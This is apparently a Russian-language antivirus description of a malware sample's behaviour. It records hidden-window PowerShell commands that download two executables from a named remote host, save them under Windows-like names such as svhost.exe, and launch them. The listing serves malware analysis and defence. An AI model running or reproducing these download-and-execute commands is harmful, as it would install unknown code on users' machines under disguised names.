Техническая информация
- http://vh481340.eurodir.ru/clr.exe as %temp%\\svhost.exe
- http://vh481340.eurodir.ru/dlc.exe as %temp%\\windowshelper.exe
- DNS ASK vh####40.eurodir.ru
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('http://vh481340.eurodir.ru/clr.exe', '%Temp%\\svhost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://vh48...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell (New-Object System.Net.WebClient).DownloadFile('http://vh481340.eurodir.ru/clr.exe', '%Temp%\\svhost.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://vh48...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\\svhost.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Process -FilePath '%TEMP%\\windowshelper.exe'